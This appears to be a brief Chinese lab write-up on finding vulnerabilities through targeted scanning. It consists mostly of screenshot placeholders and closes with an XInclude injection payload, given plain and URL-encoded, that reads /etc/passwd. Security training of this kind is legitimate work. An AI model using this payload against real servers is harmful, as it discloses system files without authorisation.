通过有针对性的扫描快速发现漏洞

image-20221230183040244

image-20221230185622568

image-20221230185642409

image-20221230185937254

找到这个

image-20221230190241099

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
       <xi:include parse="text" href="file:///etc/passwd"/>
</foo>
<foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude">
+++++++<xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/>
</foo>

image-20221230190203227